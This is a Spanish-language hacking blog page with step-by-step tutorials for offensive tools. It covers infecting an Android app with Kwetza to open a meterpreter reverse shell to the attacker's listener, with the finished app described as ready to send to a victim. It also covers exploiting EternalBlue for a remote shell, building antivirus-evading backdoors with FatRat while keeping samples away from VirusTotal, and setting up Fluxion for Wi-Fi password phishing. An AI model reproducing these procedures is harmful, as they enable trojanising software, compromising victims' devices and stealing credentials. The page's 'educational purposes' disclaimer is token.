Hacking Ético, Seguridad Informática, Redes, RedTeam

domingo, 11 de junio de 2017

Kwetza Infectar Aplicaciones Android

6/11/2017 11:17:00 p. m. Posted by Secpronet No hay comentarios

Kwetza Infectar Aplicaciones Android


¿Qué hace?

Kwetza infecta una aplicación para Android existente con cualquiera de las plantillas de encargo o de carga útil por defecto para evitar ser detectados por los antivirus. Kwetza le permite infectar aplicaciones Android usando permisos predeterminados de la aplicación de destino o se inyecta permisos adicionales para obtener una funcionalidad adicional.

¿Cómo se instala?

Primero colonas o descargamos la herramienta. https://github.com/sensepost/kwetza.git una vez clonada la herramienta procederemos a instalarla.

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar utilizando Pip:

pip install beautifulsoup4

Cabe mencionar que la herramienta necesita apktool para su funcionamiento, lo aremos de la siguiente forma. vamos a la pagina para descargarlo apktool una vez descargada la última versión  procedemos a descargar el siguiente archivo link lo guardamos como .txt "apktool.txt" el archivo .jar descargado lo remombraremos y le pondremos apktool.jar 



una  vez hecho esto lo copiamos a la siguiente ruta: /usr/local/bin luego daremos permisos a ambos archivos. 


una vez hecho todo esto procedemos a ejecutar la herramienta abrimos una terminal y desde donde la clonamos o descargamos tecleamos lo siguiente. el comando para lanzar la aplicación es la siguiente:
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no 
solo sustituiremos valores de la siguiente forma: python kwetza.py ccleaner.apk 192.168.1.10 4444 yes ccleaner es la aplicación que yo elegí mi ip y el puerto a la escucha el "si " es para darle permisos adicionales a la aplicación final.


una vez hecho esto esperamos que la aplicación haga su trabajo hasta que te llegue hasta la siguiente linea Passphrase for keystore: la contraseña por defecto es "password".


una vez terminado el proceso ya tendremos la aplicación lista para mandársela a la victima  "recuerden  esto es con fines educativos" la aplicación se guardara en la siguiente ruta: 
/root/Herramientas/kwetza/ccleaner/dist/ccleaner.apk "allí fue donde yo la instale y la aplicación que use" esto variara dependiendo de donde la guardaron. 



ya realizado todo esto procedemos a configurar Metasploit, 

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10 "nuestra ip" 
set lport 4444  "el que usamos para configurar la apk"


una vez hecho esto pues ponemos a la escucha nuestro payload  por tener la sesión exitosa. Como vemos tenemos una sesión de meterpreter exitosa.



ya con esto que vuele nuestra mente recuerden es con fines educativos.






viernes, 26 de mayo de 2017

vscan herramienta de escáner de vulnerabilidades

5/26/2017 09:03:00 p. m. Posted by Secpronet , , , , , , No hay comentarios
(VSCAN) 
Herramienta de escáner de vulnerabilidades es el uso de scripts nmap y NSE para encontrar vulnerabilidades.
Que es:  
Esta herramienta pone un valor adicional en el análisis de vulnerabilidades con nmap. Utiliza los scripts NSE que pueden añadir flexibilidad en términos de detección y explotación de la vulnerabilidad. A continuación hay algunas de las características que proporcionan los scripts NSE  
  • Detección de redes  
  • Más sofisticada detección de versión  
  • detección de vulnerabilidades  
  • la detección de puerta trasera  
  • la explotación de la vulnerabilidad 
La herramienta realiza la siguiente:
  • comprobar la comunicación a los hosts de destino por cheking peticiones ICMP 
  • toma como entrada un nombre de protocolo, como http y ejecuta todos los scripts NSE relacionados con ese protocolo 
  • si alguna vulnerabilidad provoca que guarda el resultado en un archivo de registro 
  • puede realizar todas las acciones anteriores para un rango de direcciones IP 

Instalación:

Lo primero clonaremos el repositorio:  https://github.com/xvass/vscan


lo siguiente sera darle permiso ejecutaremos el siguiente comando andentro de la acarpeta vscan: chmod +x 


ya por ultimo lo ejecutamos.

Como se usa: 

[Usage:] ./vscan.sh <ip_range> <protocol> <port> <Pn (optional)> 
[Usage:] ./vscan.sh <ips_file> <protocol> <port> <Pn (optional)> 
[Usage:] ./vscan.sh <ip> <protocol> <port> <Pn (optional)>

Ejemplo: 

./vscan.sh 192.168.1..1  port 80



Si la herramienta encuentra un vulnerabilidad en un determinado protocolo Mantiene la salida en un archivo de registro que se crean y se guardan en la siguiente ubicación. 
("/home/vulnerabilities_enumeration/http_vulnerabilities/http_vulnerabilities/http_vulnerabilities.txt")

espero les sea útil....

miércoles, 24 de mayo de 2017

Explotando la vulnerabilidad EternalBlue MS17-010


Explotando vulnerabilidad EternalBlue MS17-010


Afecta a :

Microsoft Windows Windows 8/2012 R2 (x64)

Nombre del módulo:

Exploit / ventanas / SMB / ms17_010_eternalblue

vamos a explotar: 
Entramos a metasploit y buscamos el módulo a usar.
use  Exploit / ventanas / SMB / ms17_010_eternalblue

Luego de esto veremos las opciones y las configuraremos. (como vemos lo único que modificaremos es el rhost lo demás lo dejamos así )
 
procedemos a lanzar el exploit

como vemos obtuvimos una shell remota ahora todo queda a nuestra iamaginación.


 

domingo, 14 de mayo de 2017

Como Instalar FatRat (Generador de Backdoor)

5/14/2017 09:27:00 p. m. Posted by Secpronet , , , , , , No hay comentarios
FatRat
Que es:

Una herramienta fácil para generar backdoor y herramienta fácil de post ataque de explotación como el ataque del navegador, dll. Esta herramienta compila un malware con la carga útil popular y luego el malware compilado se puede ejecutar en windows, android, mac. El malware que se creó con esta herramienta también tiene la capacidad de omitir la mayoría de la protección de software AV.


Como se instala:

Lo primero que vamos hacer es clonar el repositorio desde github
https://github.com/Screetsec/TheFatRat.git 


luego de clonar el repositorio vamos a instalarlo pero para ello hay que darle permisos al setup. lo hacemos de la siguiente manera: chmod +x setup.sh 


Luego de los permisos procedemos con la instalación, ejecutamos lo siguiente: ./setup.sh  (en caso de no tener instalado un complemento el mismo setup lo descarga e instala.)




Una vez finalizado aparecera esto.


Ejecutandolo:

para poder usarlo tenemos que darle permiso a dos archivos de la siguiente forma tecleamos esto:  chmod +x fatrat  chmod +x powerfull.sh

 
  ya cono esto si lo ejecutamos de la siguiente manera: ./fatrat 


Nota: si quieres verificar el backdoor no subir a VIRUSTOTAL ya que las firmas son enviadas a las compañias de AV  subirlo a http://www.nodistribute.com/  es lo unico que piden los desarrolladores.



ahora si por fin ya lo pueden usar.





miércoles, 10 de mayo de 2017

Como Usar Hash Identifier

5/10/2017 10:03:00 p. m. Posted by Secpronet , , , , , No hay comentarios
Hash Identifier

Que es:

Software para identificar los diferentes tipos de hashes utilizados para cifrar datos y especialmente contraseñas.

Algoritmos de encriptación que identifica son:
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • MD2
  • MD4
  • MD5
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) - Joomla
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • y muchos mas.
 Como se usa:

Por defecto ya viene incorporado en Kali Linux.

Para utilizarlo nos vamos a la parte herramientas y nos dirigimos a donde dice passwords allí buscamos Hash Identifier nos aparecera esto.





Ahora lo que tenemos que hacer es colocar el hash y dejar que la herramienta haga su trabajo.


y nos mostrará las posibles encriptaciones

 




  

domingo, 7 de mayo de 2017

Como instalar John The Ripper

5/07/2017 07:38:00 p. m. Posted by Secpronet , , , , , 8 comments
John The Ripper



Definición:
Es un programa de criptografía que aplica fuerza bruta para descifrar contraseñas. Es capaz de romper varios algoritmos de cifrado o hash, como DES, SHA-1 y otros.


 Instalación:

abrir una terminal y copiar

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz


Descomprimir

tar -xzvf john-1.8.0.tar.gz




entrar a la siguiente ruta o a donde lo instalaron copian y pegan
cd john-1.8.0/src/ 
make clean generic



por ultimo hacemos el test


ya lo podemos usar





sábado, 15 de abril de 2017

Instalar y usar Data Recovery Wizard

4/15/2017 06:26:00 p. m. Posted by Secpronet , , , No hay comentarios
Instalar y usar Data Recovery Wizard



Descripción:

EASEUS Data Recovery Wizard restaura ficheros eliminados incluso de discos formateados. También puede recuperar particiones que han sido borradas manteniendo la estructura de archivos.
La pantalla inicial del programa nos da tres opciones: Recuperar archivos eliminados, restaurar todos los ficheros de una partición o restaurar la partición misma.

Tutorial:

martes, 24 de enero de 2017

Instalar y Corregir errores de fluxion en kali linux

1/24/2017 08:40:00 p. m. Posted by Secpronet , , , , 7 comments
Instalar y Corregir errores de fluxion

Que es fluxion:
Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf

Es una nueva herramienta para hacer auditorias de seguridad inalámbrica. su funcionamiento es similar a wifite lanzando ataques de ingeniería social para que el usuario la coloque la contraseña y verificar si es la correcta.
si has tratado de instalar  fluxion te darás cuenta que te muestra errores que faltan ciertos componentes para instalar antes de ejecutarlo, pues  esta vez veremos su instalación y como corregir los errores de los componentes faltantes.



los errores de componentes son los siguientes:

dhcp-server
hostapd
lighttpd
php5-cgi


Como instalar

lo podemos hacer de dos formas.
1. clonando desde github
2. descargando desde acá:  Fluxion

abrimos una terminal , vamos al directorio donde esta y lo desempaquetamos (Descargas, Documentos, Escritorio, etc).
colocamos: sudo unzip fluxion-master
entramos al directorio cd fluxion-master luego lo corremos de la siguiente forma ./fluxion
veremos que nos muestra unos errores de color rojo, comenzamos a corregirlos.



abrimos una nueva terminal y colocamos lo siguiente:
leafpad /etc/apt/sources.list



luego de esto colocamos la lineas para los repositorios desde la pagina oficial de kali linux  


luego guardamos cambios, en la terminal colocamos lo siguiente , apt-get update esperamos que actualice, luego colocamos lo siguiente.

apt-get install isc-dhcp-server


esperamos que instale luego colocamos.

apt-get install hostapd


esperamos que instale luego colocamos esto
apt-get install lighttpd



para la instalación de php5-cgi debemos hacer lo siguiente, en una terminal nueva colocamos esto 
leafpad /etc/apt/sources.list y copiamos lo siguiente.  




deb http://old.kali.org/kali sana main non-free contrib, quedando de la siguiente forma



guardamos los cambios y ejecutamos lo siguiente: apt-get update esperamos que actualice y ejecutamos lo siguiente.

apt-get remove php5 php5-common php5-mysql php5-xmlrpc php5-cgi php5-curl php5-gd php5-cli php5-fpm php-apc php-pear php5-dev php5-imap php5-mcrypt



esperamos que termine y luego ejecutamosapt-get install libapache2-mod-php5 esperamos que termine la instalación.




ya para terminar ejecutamos 


apt-get install php5-cgi

esperamos que termine de instalar, ahora ya podemos ejecutar fluxion sin ningún problema
lo hacemos desde la siguiente forma, entramos al directorio donde lo tenemos guardado o clonado
colocamos ./fluxion y les quedaría de la siguiente forma.




ya con esto estar funcionando fluxion.













Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf


Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf
Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.